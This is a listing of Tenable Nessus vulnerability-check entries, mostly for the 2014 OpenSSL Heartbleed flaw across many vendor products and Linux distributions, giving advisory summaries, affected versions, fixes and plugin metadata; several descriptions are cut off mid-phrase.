    NASL idBLACKBERRY_ES_UDS_KB35882.NASL
    descriptionThe BlackBerry Enterprise Service (BES) install on the remote host is affected by an out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id73762
    published2014-04-29
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73762
    titleBlackBerry Enterprise Service Information Disclosure (KB35882) (Heartbleed)
  • NASL familyCentOS Local Security Checks
    NASL idCENTOS_RHSA-2014-0376.NASL
    descriptionUpdated openssl packages that fix one security issue are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library. An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) Red Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter. All OpenSSL users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
    last seen2020-06-01
    modified2020-06-02
    plugin id73387
    published2014-04-08
    reporterThis script is Copyright (C) 2014 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73387
    titleCentOS 6 : openssl (CESA-2014:0376)
  • NASL familyMisc.
    NASL idKERIO_CONNECT_824.NASL
    descriptionAccording to its banner, the remote host is running a version of Kerio Connect (formerly Kerio MailServer) version 8.2.x prior to 8.2.4. It is, therefore, affected by an out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id76402
    published2014-07-08
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/76402
    titleKerio Connect 8.2.x < 8.2.4 Heartbeat Information Disclosure (Heartbleed)
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2014-4999.NASL
    descriptionFixes CVE-2014-0160 (RHBZ #1085066) Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-03-17
    modified2014-04-16
    plugin id73547
    published2014-04-16
    reporterThis script is Copyright (C) 2014-2020 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73547
    titleFedora 19 : mingw-openssl-1.0.1e-6.fc19 (2014-4999) (Heartbleed)
  • NASL familyFreeBSD Local Security Checks
    NASL idFREEBSD_PKG_5631AE98BE9E11E3B5E3C80AA9043978.NASL
    descriptionOpenSSL Reports : A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server. Affected users should upgrade to OpenSSL 1.0.1g. Users unable to immediately upgrade can alternatively recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS. The bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop communications, steal data directly from the services and users and to impersonate services and users. The code used to handle the Heartbeat Extension does not do sufficient boundary checks on record length, which allows reading beyond the actual payload.
    last seen2020-06-01
    modified2020-06-02
    plugin id73389
    published2014-04-08
    reporterThis script is Copyright (C) 2014 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73389
    titleFreeBSD : OpenSSL -- Remote Information Disclosure (5631ae98-be9e-11e3-b5e3-c80aa9043978)
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2014-4982.NASL
    descriptionFixes CVE-2014-0160 (RHBZ #1085066) Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-03-17
    modified2014-04-15
    plugin id73509
    published2014-04-15
    reporterThis script is Copyright (C) 2014-2020 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73509
    titleFedora 20 : mingw-openssl-1.0.1e-6.fc20 (2014-4982) (Heartbleed)
  • NASL familyWindows
    NASL idHP_VCRM_SSRT101531.NASL
    descriptionThe HP Version Control Repository Manager (VCRM) install on the remote Windows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or 7.3.1. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id77025
    published2014-08-06
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/77025
    titleHP Version Control Repository Manager (VCRM) Heartbeat Information Disclosure (Heartbleed)
  • NASL familyCGI abuses
    NASL idWD_ARKEIA_10_1_19_VER_CHECK.NASL
    descriptionThe self-reported version of the remote Western Digital Arkeia device is prior to 10.1.19 / 10.2.9. It is, therefore, potentially affected by the following vulnerabilities : - An out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id74262
    published2014-06-02
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/74262
    titleWestern Digital Arkeia 10.1.x < 10.1.19 / 10.2.x < 10.2.9 Multiple Vulnerabilities (Heartbleed)
  • NASL familyJunos Local Security Checks
    NASL idJUNIPER_JSA10623.NASL
    descriptionAccording to its self-reported version number, the remote Junos device is affected by an information disclosure vulnerability. An out-of-bounds read error, known as Heartbleed, exists in the TLS/DTLS implementation due to improper handling of TLS heartbeat extension packets. A remote attacker, using crafted packets, can trigger a buffer over-read, resulting in the disclosure of up to 64KB of process memory, which contains sensitive information such as primary key material, secondary key material, and other protected content. Note that this issue only affects devices with J-Web or the SSL service for JUNOScript enabled.
    last seen2020-03-18
    modified2014-04-18
    plugin id73687
    published2014-04-18
    reporterThis script is Copyright (C) 2014-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73687
    titleJuniper Junos OpenSSL Heartbeat Information Disclosure (JSA10623) (Heartbleed)
  • NASL familyWindows
    NASL idHP_VCA_SSRT101531.NASL
    descriptionThe installation of HP Version Control Agent (VCA) on the remote Windows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or 7.3.1. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id77024
    published2014-08-06
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/77024
    titleHP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-2165-1.NASL
    descriptionNeel Mehta discovered that OpenSSL incorrectly handled memory in the TLS heartbeat extension. An attacker could use this issue to obtain up to 64k of memory contents from the client or server, possibly leading to the disclosure of private keys and other sensitive information. (CVE-2014-0160) Yuval Yarom and Naomi Benger discovered that OpenSSL incorrectly handled timing during swap operations in the Montgomery ladder implementation. An attacker could use this issue to perform side-channel attacks and possibly recover ECDSA nonces. (CVE-2014-0076).
    last seen2020-03-18
    modified2014-04-08
    plugin id73402
    published2014-04-08
    reporterUbuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73402
    titleUbuntu 12.04 LTS / 12.10 / 13.10 : openssl vulnerabilities (USN-2165-1)
  • NASL familySuSE Local Security Checks
    NASL idOPENSUSE-2014-398.NASL
    description - tor 0.2.4.22 [bnc#878486] Tor was updated to the recommended version of the 0.2.4.x series. - major features in 0.2.4.x : - improved client resilience - support better link encryption with forward secrecy - new NTor circuit handshake - change relay queue for circuit create requests from size-based limit to time-based limit - many bug fixes and minor features - changes contained in 0.2.4.22: Backports numerous high-priority fixes. These include blocking all authority signing keys that may have been affected by the OpenSSL
    last seen2020-06-05
    modified2014-06-13
    plugin id75376
    published2014-06-13
    reporterThis script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/75376
    titleopenSUSE Security Update : tor (openSUSE-SU-2014:0719-1) (Heartbleed)
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-2896.NASL
    descriptionA vulnerability has been discovered in OpenSSL
    last seen2020-03-17
    modified2014-04-08
    plugin id73388
    published2014-04-08
    reporterThis script is Copyright (C) 2014-2020 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73388
    titleDebian DSA-2896-1 : openssl - security update
  • NASL familyCISCO
    NASL idCISCO-VCS-CSCUO16472.NASL
    descriptionAccording to its self-reported version number, the version of Cisco TelePresence Video Communication Server installed on the remote host is affected by an out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id74010
    published2014-05-14
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/74010
    titleCisco TelePresence Video Communication Server Heartbeat Information Disclosure (Heartbleed)
  • NASL familyWindows
    NASL idATTACHMATE_REFLECTION_X_HEARTBLEED.NASL
    descriptionThe Attachmate Reflection X install on the remote host is affected by an out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id74186
    published2014-05-27
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/74186
    titleAttachmate Reflection X Heartbeat Information Disclosure (Heartbleed)
  • NASL familyMisc.
    NASL idVMWARE_ESXI_5_5_BUILD_1746974_REMOTE.NASL
    descriptionThe remote VMware ESXi host is 5.5 prior to build 1746974 or 5.5 Update 1 prior to build 1746018. It is, therefore, potentially affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the
    last seen2020-06-01
    modified2020-06-02
    plugin id73917
    published2014-05-08
    reporterThis script is (C) 2014-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73917
    titleESXi 5.5 < Build 1746974 / 5.5 Update 1 < Build 1746018 OpenSSL Library Multiple Vulnerabilities (remote check) (Heartbleed)
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2014-4879.NASL
    descriptionpull in upstream patch for CVE-2014-0160
    last seen2020-03-17
    modified2014-04-09
    plugin id73429
    published2014-04-09
    reporterThis script is Copyright (C) 2014-2020 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73429
    titleFedora 20 : openssl-1.0.1e-37.fc20.1 (2014-4879)
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2014-5321.NASL
    descriptionNew upstream release Supports OpenSSL DLLs 1.0.1g. Fixes to take care of OpenSSL's TLS heartbeat read overrun (CVE-2014-0160). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-03-17
    modified2014-04-30
    plugin id73775
    published2014-04-30
    reporterThis script is Copyright (C) 2014-2020 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73775
    titleFedora 20 : stunnel-5.01-1.fc20 (2014-5321)
  • NASL familyWindows
    NASL idVMWARE_PLAYER_MULTIPLE_VMSA_2014-0004.NASL
    descriptionThe installed version of VMware Player 6.x running on Windows is earlier than 6.0.2. It is, therefore, reportedly affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the
    last seen2020-06-01
    modified2020-06-02
    plugin id73672
    published2014-04-21
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73672
    titleVMware Player 6.x < 6.0.2 OpenSSL Library Multiple Vulnerabilities (VMSA-2014-0004) (Heartbleed)
  • NASL familyMandriva Local Security Checks
    NASL idMANDRIVA_MDVSA-2014-123.NASL
    descriptionUpdated tor packages fix multiple vulnerabilities : Tor before 0.2.4.20, when OpenSSL 1.x is used in conjunction with a certain HardwareAccel setting on Intel Sandy Bridge and Ivy Bridge platforms, does not properly generate random numbers for relay identity keys and hidden-service identity keys, which might make it easier for remote attackers to bypass cryptographic protection mechanisms via unspecified vectors (CVE-2013-7295). Update to version 0.2.4.22 solves these major and security problems : - Block authority signing keys that were used on authorities vulnerable to the heartbleed bug in OpenSSL (CVE-2014-0160). - Fix a memory leak that could occur if a microdescriptor parse fails during the tokenizing step. - The relay ciphersuite list is now generated automatically based on uniform criteria, and includes all OpenSSL ciphersuites with acceptable strength and forward secrecy. - Relays now trust themselves to have a better view than clients of which TLS ciphersuites are better than others. - Clients now try to advertise the same list of ciphersuites as Firefox 28. For other changes see the upstream change log
    last seen2020-06-01
    modified2020-06-02
    plugin id74481
    published2014-06-12
    reporterThis script is Copyright (C) 2014-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/74481
    titleMandriva Linux Security Advisory : tor (MDVSA-2014:123)
  • NASL familyMisc.
    NASL idHP_ONBOARD_ADMIN_HEARTBLEED_VERSIONS.NASL
    descriptionThe remote host has version 4.11 or 4.20 of HP BladeSystem c-Class Onboard Administrator. It is, therefore, affected by an out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id76509
    published2014-07-15
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/76509
    titleHP BladeSystem c-Class Onboard Administrator 4.11 / 4.20 Heartbeat Information Disclosure (Heartbleed)
  • NASL familyWindows
    NASL idWEBSENSE_WEB_SECURITY_HEARTBLEED.NASL
    descriptionThe version of Websense Web Security installed on the remote Windows host contains a bundled version of an OpenSSL DLL file. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id73759
    published2014-04-29
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73759
    titleWebsense Web Security Heartbeat Information Disclosure (Heartbleed)
  • NASL familyCGI abuses
    NASL idBLUECOAT_PROXY_AV_3_5_1_9.NASL
    descriptionAccording to its self-reported version number, the firmware installed on the remote host is affected by an information disclosure vulnerability. An out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id74037
    published2014-05-16
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/74037
    titleBlue Coat ProxyAV 3.5.1.1 - 3.5.1.6 Heartbeat Information Disclosure (Heartbleed)
  • NASL familyFirewalls
    NASL idBLUECOAT_PROXY_SG_6_5_3_6.NASL
    descriptionThe remote Blue Coat ProxySG device
    last seen2020-06-01
    modified2020-06-02
    plugin id73515
    published2014-04-15
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73515
    titleBlue Coat ProxySG Heartbeat Information Disclosure (Heartbleed)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2014-0378.NASL
    descriptionAn updated rhev-hypervisor6 package that fixes one security issue is now available. The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes everything necessary to run and manage virtual machines: a subset of the Red Hat Enterprise Linux operating environment and the Red Hat Enterprise Virtualization Agent. Note: Red Hat Enterprise Virtualization Hypervisor is only available for the Intel 64 and AMD64 architectures with virtualization extensions. An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) Red Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter. Users of the Red Hat Enterprise Virtualization Hypervisor are advised to upgrade to this updated package, which corrects this issue.
    last seen2020-06-01
    modified2020-06-02
    plugin id79006
    published2014-11-08
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/79006
    titleRHEL 6 : rhev-hypervisor6 (RHSA-2014:0378) (Heartbleed)
  • NASL familyMisc.
    NASL idMCAFEE_WEB_GATEWAY_SB10071.NASL
    descriptionThe remote host is running a version of McAfee Web Gateway (MWG) that is affected by an information disclosure vulnerability due to a flaw in the OpenSSL library, commonly known as the Heartbleed bug. An attacker could potentially exploit this vulnerability repeatedly to read up to 64KB of memory from the device.
    last seen2020-06-01
    modified2020-06-02
    plugin id73836
    published2014-05-02
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73836
    titleMcAfee Web Gateway OpenSSL Information Disclosure (SB10071) (Heartbleed)
  • NASL familyWindows
    NASL idIBM_RATIONAL_CLEARQUEST_8_0_1_3_01.NASL
    descriptionThe remote host has a version of IBM Rational ClearQuest 7.1.1.x / 7.1.2.x prior to 7.1.2.13.01 / 8.0.0.x prior to 8.0.0.10.01 / 8.0.1.x prior to 8.0.1.3.01 installed. It is, therefore, potentially affected by multiple vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that allows nonce disclosure via the
    last seen2020-06-01
    modified2020-06-02
    plugin id81782
    published2015-03-12
    reporterThis script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/81782
    titleIBM Rational ClearQuest 7.1.1.x / 7.1.2.x < 7.1.2.13.01 / 8.0.0.x < 8.0.0.10.01 / 8.0.1.x < 8.0.1.3.01 OpenSSL Library Multiple Vulnerabilities (credentialed check) (Heartbleed)
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2014-5337.NASL
    descriptionNew upstream release with following important changes : Supports OpenSSL DLLs 1.0.1g. Fixes to take care of OpenSSL
    last seen2020-03-17
    modified2014-04-30
    plugin id73776
    published2014-04-30
    reporterThis script is Copyright (C) 2014-2020 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73776
    titleFedora 19 : stunnel-5.01-1.fc19 (2014-5337)
  • NASL familyOracle Linux Local Security Checks
    NASL idORACLELINUX_ELSA-2014-0376.NASL
    descriptionFrom Red Hat Security Advisory 2014:0376 : Updated openssl packages that fix one security issue are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library. An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) Red Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter. All OpenSSL users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
    last seen2020-06-01
    modified2020-06-02
    plugin id73395
    published2014-04-08
    reporterThis script is Copyright (C) 2014 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73395
    titleOracle Linux 6 : openssl (ELSA-2014-0376)
  • NASL familyMisc.
    NASL idMCAFEE_NGFW_SB10071.NASL
    descriptionThe remote host is running a version of McAfee Next Generation Firewall (NGFW) that is affected by an information disclosure vulnerability due to a flaw in the OpenSSL library, commonly known as the Heartbleed bug. An attacker could potentially exploit this vulnerability repeatedly to read up to 64KB of memory from the device.
    last seen2020-06-01
    modified2020-06-02
    plugin id73835
    published2014-05-02
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73835
    titleMcAfee Next Generation Firewall OpenSSL Information Disclosure (SB10071) (Heartbleed)
  • NASL familyWeb Servers
    NASL idOPENSSL_1_0_1G.NASL
    descriptionAccording to its banner, the remote web server uses a version of OpenSSL 1.0.1 prior to 1.0.1g. The OpenSSL library is, therefore, reportedly affected by the following vulnerabilities : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the
    last seen2020-06-01
    modified2020-06-02
    plugin id73404
    published2014-04-08
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73404
    titleOpenSSL 1.0.1 < 1.0.1g Multiple Vulnerabilities (Heartbleed)
  • NASL familyGentoo Local Security Checks
    NASL idGENTOO_GLSA-201404-07.NASL
    descriptionThe remote host is affected by the vulnerability described in GLSA-201404-07 (OpenSSL: Information Disclosure) Multiple vulnerabilities have been found in OpenSSL: OpenSSL incorrectly handles memory in the TLS heartbeat extension, leading to information disclosure of 64kb per request, possibly including private keys (“Heartbleed bug”, OpenSSL 1.0.1 only, CVE-2014-0160). The Montgomery ladder implementation of OpenSSL improperly handles swap operations (CVE-2014-0076). Impact : A remote attacker could exploit these issues to disclose information, including private keys or other sensitive information, or perform side-channel attacks to obtain ECDSA nonces. Workaround : Disabling the tls-heartbeat USE flag (enabled by default) provides a workaround for the CVE-2014-0160 issue.
    last seen2020-06-01
    modified2020-06-02
    plugin id73407
    published2014-04-08
    reporterThis script is Copyright (C) 2014-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73407
    titleGLSA-201404-07 : OpenSSL: Information Disclosure
  • NASL familyMisc.
    NASL idJUNOS_PULSE_JSA10623.NASL
    descriptionAccording to its self-reported version, the version of IVE / UAC OS running on the remote host is affected by an information disclosure vulnerability. An out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id73688
    published2014-04-18
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73688
    titleJunos Pulse Secure Access IVE / UAC OS OpenSSL Heartbeat Information Disclosure (JSA10623) (Heartbleed)
  • NASL familyNewStart CGSL Local Security Checks
    NASL idNEWSTART_CGSL_NS-SA-2019-0033_OPENSSL.NASL
    descriptionThe remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has openssl packages installed that are affected by multiple vulnerabilities: - OpenSSL 1.0.2 (starting from version 1.0.2b) introduced an error state mechanism. The intent was that if a fatal error occurred during a handshake then OpenSSL would move into the error state and would immediately fail if you attempted to continue the handshake. This works as designed for the explicit handshake functions (SSL_do_handshake(), SSL_accept() and SSL_connect()), however due to a bug it does not work correctly if SSL_read() or SSL_write() is called directly. In that scenario, if the handshake fails then a fatal error will be returned in the initial function call. If SSL_read()/SSL_write() is subsequently called by the application for the same SSL object then it will succeed and the data is passed without being decrypted/encrypted directly from the SSL/TLS record layer. In order to exploit this issue an application bug would have to be present that resulted in a call to SSL_read()/SSL_write() being issued after having already received a fatal error. OpenSSL version 1.0.2b-1.0.2m are affected. Fixed in OpenSSL 1.0.2n. OpenSSL 1.1.0 is not affected. (CVE-2017-3737) - There is an overflow bug in the AVX2 Montgomery multiplication procedure used in exponentiation with 1024-bit moduli. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH1024 are considered just feasible, because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be significant. However, for an attack on TLS to be meaningful, the server would have to share the DH1024 private key among multiple clients, which is no longer an option since CVE-2016-0701. 
This only affects processors that support the AVX2 but not ADX extensions like Intel Haswell (4th generation). Note: The impact from this issue is similar to CVE-2017-3736, CVE-2017-3732 and CVE-2015-3193. OpenSSL version 1.0.2-1.0.2m and 1.1.0-1.1.0g are affected. Fixed in OpenSSL 1.0.2n. Due to the low severity of this issue we are not issuing a new release of OpenSSL 1.1.0 at this time. The fix will be included in OpenSSL 1.1.0h when it becomes available. The fix is also available in commit e502cc86d in the OpenSSL git repository. (CVE-2017-3738) - There is a carry propagating bug in the x86_64 Montgomery squaring procedure in OpenSSL before 1.0.2m and 1.1.0 before 1.1.0g. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH are considered just feasible (although very difficult) because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be very significant and likely only accessible to a limited number of attackers. An attacker would additionally need online access to an unpatched system using the target private key in a scenario with persistent DH parameters and a private key that is shared between multiple clients. This only affects processors that support the BMI1, BMI2 and ADX extensions like Intel Broadwell (5th generation) and later or AMD Ryzen. (CVE-2017-3736) - OpenSSL 0.9.7 before 0.9.7l and 0.9.8 before 0.9.8d allows remote attackers to cause a denial of service (infinite loop and memory consumption) via malformed ASN.1 structures that trigger an improperly handled error condition. 
(CVE-2006-2937) - OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows attackers to cause a denial of service (CPU consumption) via parasitic public keys with large (1) public exponent or (2) public modulus values in X.509 certificates that require extra time to process when using RSA signature verification. (CVE-2006-2940) - Buffer overflow in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions has unspecified impact and remote attack vectors involving a long list of ciphers. (CVE-2006-3738) - OpenSSL before 0.9.7, 0.9.7 before 0.9.7k, and 0.9.8 before 0.9.8c, when using an RSA key with exponent 3, removes PKCS-1 padding before generating a hash, which allows remote attackers to forge a PKCS #1 v1.5 signature that is signed by that RSA key and prevents OpenSSL from correctly verifying X.509 and other certificates that use PKCS #1. (CVE-2006-4339) - The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference. (CVE-2006-4343) - The BN_from_montgomery function in crypto/bn/bn_mont.c in OpenSSL 0.9.8e and earlier does not properly perform Montgomery multiplication, which might allow local users to conduct a side-channel attack and retrieve RSA private keys. (CVE-2007-3108) - Off-by-one error in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8f allows remote attackers to execute arbitrary code via unspecified vectors. (CVE-2007-4995) - Off-by-one error in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 up to 0.9.7l, and 0.9.8 up to 0.9.8f, might allow remote attackers to execute arbitrary code via a crafted packet that triggers a one-byte buffer underflow. NOTE: this issue was introduced as a result of a fix for CVE-2006-3738. 
As of 20071012, it is unknown whether code execution is possible. (CVE-2007-5135) - Double free vulnerability in OpenSSL 0.9.8f and 0.9.8g, when the TLS server name extensions are enabled, allows remote attackers to cause a denial of service (crash) via a malformed Client Hello packet. NOTE: some of these details are obtained from third party information. (CVE-2008-0891) - OpenSSL 0.9.8f and 0.9.8g allows remote attackers to cause a denial of service (crash) via a TLS handshake that omits the Server Key Exchange message and uses particular cipher suites, which triggers a NULL pointer dereference. (CVE-2008-1672) - The dtls1_buffer_record function in ssl/d1_pkt.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allows remote attackers to cause a denial of service (memory consumption) via a large series of future epoch DTLS records that are buffered in a queue, aka DTLS record buffer limitation bug. (CVE-2009-1377) - Multiple memory leaks in the dtls1_process_out_of_seq_message function in ssl/d1_both.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allow remote attackers to cause a denial of service (memory consumption) via DTLS records that (1) are duplicates or (2) have sequence numbers much greater than current sequence numbers, aka DTLS fragment handling memory leak. (CVE-2009-1378) - Use-after-free vulnerability in the dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL 1.0.0 Beta 2 allows remote attackers to cause a denial of service (openssl s_client crash) and possibly have unspecified other impact via a DTLS packet, as demonstrated by a packet from a server that uses a crafted server certificate. 
